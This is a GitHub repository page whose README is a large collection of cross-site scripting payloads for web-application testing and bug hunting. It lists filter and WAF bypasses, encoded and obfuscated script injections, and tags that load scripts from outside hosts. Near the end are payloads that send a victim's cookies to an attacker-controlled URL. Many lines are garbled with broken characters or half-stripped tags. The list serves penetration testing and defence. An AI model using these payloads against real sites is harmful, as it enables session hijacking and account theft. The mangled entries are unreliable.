https://github.com/ihebski/XSS-Payloads
Collection of XSS Payloads for fun and profit
bugbounty bughunter javascript payloads pentesting xss-exploitation xss-payloads
- Host: GitHub
- URL: https://github.com/ihebski/XSS-Payloads
- Owner: ihebski
- Created: 2018-12-02T19:06:25.000Z (about 6 years ago)
- Default Branch: master
- Last Pushed: 2020-08-14T12:19:14.000Z (over 4 years ago)
- Last Synced: 2024-05-01T13:35:11.368Z (9 months ago)
- Topics: bugbounty, bughunter, javascript, payloads, pentesting, xss-exploitation, xss-payloads
- Size: 93.8 KB
- Stars: 150
- Watchers: 10
- Forks: 60
- Open Issues: 0
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-security-vul-llm - ihebski/XSS-Payloads - contains payload code examples for a range of standard and recent XSS attack vectors (LLM analysis process)
README
# XSS-Payloads
XSS payloads collection for testing web applications during an engagement
## Payloads for 2020 - Some updates
Extracted from https://netsec.expert/2020/02/01/xss-in-2020.html (Awesome work)
*SVG*
```javascript
# newline char
# tab char
# new page char (0xc)
```
*Standard HTML events*
```javascript
(firefox only)
(firefox only)
(firefox only)
(chrome & opera only)
```
*Standard HTML events - Video load*
```javascript
```
*CSS-based events*
```javascript
@keyframes x {}XSS
XSS
```
*Weird XSS vectors*
```javascript
```
---
```javascript
By MrPapercut
/**
* JS without english, slash, plus or minus
 * (as extra challenge: no numbers or different-language characters either)
 * First we need a few numbers
0: []<<[]
1: !!{}<
```
Bypass WAF
```javascript
alert(1)-%26apos%3B
anythinglr00alert(document.domain)uxldzanythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```
Payloads
```javascript
alert(123);
alert("XSS");
alert(123)
alert("hellox worldss");
alert(�XSS�)
alert(�XSS�);
alert(�XSS�)
�>alert(�XSS�)
alert(/XSS�)
alert(/XSS/)
alert(1)
�; alert(1);
�)alert(1);//
alert(1)
{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt %00>alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=`%00`
 onerror=alert(1)

<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)><form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	  src="javascript:alert(1)" 	;><a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
/**/alert(document.location)/**/
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
alert(0%0)
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/
|\>''alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);
X
http://www.alert(1)
alert(1)
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
+-+-1-+-+alert(1)
/*<script* */alert(1)//
confirm(1);
alert(1)<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert(1) style="x:">
<--` --!>
x">
CLICKME
String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)
�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�>�>�>alert(String.fromCharCode(88,83,83))
alert(�XSS�)�>
<alert(�XSS�);//<
%253cscript%253ealert(1)%253c/script%253e
�>alert(document.cookie)
fooalert(1)
ipt>alert(1)ipt>
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))'" SRC="http://ha.ckers.org/xss.js">
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
<alert("XSS");//<
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
<script>alert("hellox worldss")&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
alert("XSS");&search=1
0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Searchhellox worldss
...
lol
<img src="
foo=">alert(1)">
alert(1)">
foo=">alert(1)">
foo=">"><% foo>
LOL
LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}
({0:#0=alert/#0#/#0#(0)})
LOLalert(123)
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\\";alert('XSS');//
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
<BGSOUND SRC=\"javascript:alert('XSS');\">
<BR SIZE=\"&{alert('XSS')}\">
<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
<XSS STYLE=\"behavior: url(xss.htc);\">
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox(\"XSS\")'>
<IMG SRC=\"mocha:[code]\">
<IMG SRC=\"livescript:[code]\">
�scriptualert(EXSSE)�/scriptu
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert('XSS')\">
<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"width: expression(alert('XSS'));\">
<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
<XSS STYLE=\"xss:expression(alert('XSS'))\">
exp/*<A STYLE='no\xss:noxss(\"*//*\");
xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
<BASE HREF=\"javascript:alert('XSS');//\">
<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>
<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
<XML SRC=\"xsstest.xml\" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>
<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
<?import namespace=\"t\" implementation=\"#default#time2\">
<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">
</BODY></HTML>
<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
<? echo('<SCR)';
echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<A HREF=\"http://66.102.7.147/\">XSS</A>
<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
<A HREF=\"http://1113982867/\">XSS</A>
<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
<A HREF=\"//www.google.com/\">XSS</A>
<A HREF=\"//google\">XSS</A>
<A HREF=\"http://ha.ckers.org@google\">XSS</A>
<A HREF=\"http://google:ha.ckers.org\">XSS</A>
<A HREF=\"http://google.com/\">XSS</A>
<A HREF=\"http://www.google.com./\">XSS</A>
<A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
<A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
<
%3C
\x3c
\x3C
\u003c
\u003C
<iframe src=http://ha.ckers.org/scriptlet.html>
<IMG SRC=\"javascript:alert('XSS')\"
<SCRIPT SRC=//ha.ckers.org/.js>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<<SCRIPT>alert(\"XSS\");//<</SCRIPT>
<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<IMG SRC=\" javascript:alert('XSS');\">
perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=\"javascript:alert('XSS');\">
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
'';!--\"<XSS>=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
'';!--"=&{()}
alert("XSS")"><alert("XSS");//<
a=/XSS/alert(a.source)
\";alert('XSS');//
alert("XSS");
�script�alert(�XSS�)�/script�
@im\port'\ja\vasc\ript:alert("XSS")';
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
TESTHTML5FORMACTION
crosssitespt
<img src="foo=">alert(1)">
alert(1)">
foo=">alert(1)">
({0:#0=alert/#0#/#0#(123)})
ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x
Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()
{alert(1)};1
crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')
alert(1)+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
�>alert(document.cookie)
�>alert(document.cookie)
�><alert(document.cookie);//<
fooalert(document.cookie)
ipt>alert(document.cookie)ipt>
%22/%3E%3CBODY%20onload=�document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)�%3E
�; alert(document.cookie); var foo=�
foo\�; alert(document.cookie);//�;
alert(document.cookie)alert(1)
">alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))>
;!--"=&{()}"
alert("XSS")">
perl -e 'print "";' > out<alert("XSS");//<
\";alert('XSS');//
alert(/XSS/.source)alert("XSS");
"
@im\port'\ja\vasc\ript:alert("XSS")';
alert('XSS');
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);
]]>
">
echo('alert("XSS")'); ?>//-->">'>alert(String.fromCharCode(88,83,83))
=alert('XSS');">
- XSS
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
,&alert('XSS');">
<!--alert('XSS');//-->
![CDATA[
alert('XSS');
alert('XSS');;
[\xC0][\xBC]script>alert('XSS');[\xC0][\xBC]/script>
]]
X
onload=alert(/XSS/)>
onload=alert(/XSS/)>
" onfocus=alert(XSS) "> <"
" onblur=alert(XSS) "> <"
" onmouseover=alert(XSS) ">
" onclick=alert(XSS) ">li {list-style-image: url(\"javascript:alert('XSS')\");}
'">alert(XSS)
- XSS
'""> alert('X \nS \nS');
<<<<>>>><<<script>alert(XSS)
(XSS)(XSS)'>alert(XSS)
}a=eval;b=alert;a(b(/XSS/.source));
document.write("XSS");
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
='>alert("xss")
alert(XSS)>
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
alert('XSS');
'';!--"=&{()}
id=XSS SRC=
<IMG id=XSS SRC="javascript:alert('XSS')"
<SCRIPT>a=/XSS/
\";alert('XSS');//
<INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNid=XSS SRC="javascript:alert('XSS')">
<IMG LOWid=XSS SRC="javascript:alert('XSS')">
<BGSOUND id=XSS SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LAYER id=XSS SRC="http://xxxx.com/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://xxxx.com/xss.css">
<STYLE>@import'http://xxxx.com/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://xxxx.com/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://xxxx.com/xssmoz.xml#xss")}</STYLE>
<IMG id=XSS SRC='vbscript:msgbox("XSS")'>
<IMG id=XSS SRC="mocha:[code]">
<IMG id=XSS SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME id=XSS SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME id=XSS SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://xxxx.com/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
getURL("javascript:alert('XSS')")
a="get";
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG id=XSS SRC="javas<![CDATA[cript:alert('XSS');">
<XML id=XSS SRC="http://xxxx.com/xsstest.xml" ID=I></XML>
<HTML><BODY>
<SCRIPT id=XSS SRC="http://xxxx.com/xss.jpg">echo('
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-'" id=XSS SRC="http://xxxx.com/xss.js">
` id=XSS SRC="http://xxxx.com/xss.js">
document.write("<SCRI");PT id=XSS SRC="http://xxxx.com/xss.js">
alert(1)
Null-byte character between HTML attribute name and equal sign (IE, Safari).
Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
Vertical tab between HTML attribute name and equal sign (IE, Safari).
Null-byte character between equal sign and JavaScript code (IE).
Null-byte character between characters of HTML attribute names (IE).
Null-byte character before characters of HTML element names (IE).
<\x00img src='1' onerror=alert(0) />
Null-byte character after characters of HTML element names (IE, Safari).
alert(1)
Null-byte character between characters of HTML element names (IE).
Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
Use vertical tabs instead of whitespace (IE, Safari).
Use quotes instead of whitespace in some situations (Safari).
Use null-bytes instead of whitespaces in some situations (IE).
Just don't use spaces (IE, Firefox, Chrome, Safari).
Prefix URI schemes.
Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)
No greater-than characters needed (IE, Firefox, Chrome, Safari).
alert(0)
Backslash character between expression and opening parenthesis (IE).
body{background-color:expression\(alert(1))}
JavaScript Escaping
document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');
Encoding Galore.
HTML Attribute Encoding
URL Encoding
CSS Hexadecimal Encoding (IE specific examples)
JokerJokerJokerJoker
JavaScript (hexadecimal, octal, and unicode)
document.write('<img src=1 onerror=alert(1)>');
document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');
document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');
document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');
JavaScript (Decimal char codes)
document.write('<img src=1 onerror=alert(1)>');
document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));
JavaScript (Unicode function and variable names)
alert(123)
\u0061\u006C\u0065\u0072\u0074(123)
Overlong UTF-8 (SiteMinder is awesome!)
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
UTF-7 (Missing charset?)
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
Unicode .NET Ugliness
alert(1)
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
Classic ASP performs some unicode homoglyphic translations... don't ask why...
%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
Useless and/or Useful features.
HTML 5 (Not comprehensive)
Usage of non-existent elements (IE)
CSS Comments (IE)
Alternate ways of executing JavaScript functions
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
Split up JavaScript into HTML attributes
HTML is parsed before JavaScript
var junk = 'alert(1)';
HTML is parsed before CSS
body { background-image:url('http://www.blah.com/alert(1)'); }
XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).
URI Schemes
(IE)
(Firefox, Chrome, Safari)
(Firefox, Chrome, Safari)
HTTP Parameter Pollution
http://target.com/something.xxx?a=val1&a=val2
ASP.NET a = val1,val2
ASP a = val1,val2
JSP a = val1
PHP a = val2
Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
eval(location.hash.slice(1))
eval(location.hash) (Firefox)
http://target.com/something.jsp?inject=eval(location.hash.slice(1))#alert(1)
Two Stage XSS via name attribute
Non-alphanumeric craziness...
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
'));)>
< script > < / script>
<
<<
<<<
">"
<script>alert("XSS")
<alert("XSS");//<
alert(document.cookie)
'>alert(document.cookie)
'>alert(document.cookie);
";alert('XSS');//
%3cscript%3ealert("XSS");%3c/script%3e
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
<script>alert(document.cookie);
<script>alert(document.cookie);<script>alert
alert('XSS')
alert("XSS")">
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
">document.location='http://your.site.com/cgi-bin/cookie.cgi?'???.cookie
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//>!--alert(String.fromCharCode(88,83,83))=&{}
